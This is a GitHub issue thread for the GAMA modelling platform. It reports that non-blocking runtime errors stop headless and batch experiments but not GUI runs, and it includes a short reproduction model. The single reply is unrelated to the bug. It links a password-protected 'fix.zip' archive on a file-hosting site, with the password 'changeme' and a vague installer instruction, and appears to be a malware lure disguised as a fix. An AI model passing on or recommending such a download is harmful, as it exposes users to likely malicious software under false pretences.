### ISSUE TITLE
[headless] a model containing a non-blocking error breaks headless but works fine in GUI

### ISSUE THREAD

**Issue by lesquoyb** [gama-platform/gama#301]
**Describe the bug**
Some errors in gama are non-blocking, meaning that the simulation will continue anyway even though the error view is open in the GUI.
The problem is that those same errors are completely stopping the experiment when run through headless, whether it's batch or server.

**To Reproduce**
1. In GUI mode run this model:
```
model errors

global{
	
	reflex i{
		let i <- ln(0);
		write "I'm still working";
	}
}

experiment a type:batch until:cycle=10;
```
3. See that the error window opens but the simulation continues
4. now run it in headless (`gama-headless -batch a /path/to/file.gaml` or through gama-server)
5. See error

**Expected behavior**
The error is shown but the simulation continues as it's the case for GUI mode

**Additional context**
In previous versions of gama it was looping forever over the exception, filling the console but recent changes in batch changed that to stopping the execution of the simulation.
Gama doesn't completely close though and the simulation's thread is still running here is gama's state once the error happen:
![image](https://github.com/user-attachments/assets/add905e9-9d01-4377-9b67-4835546b6ece)

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
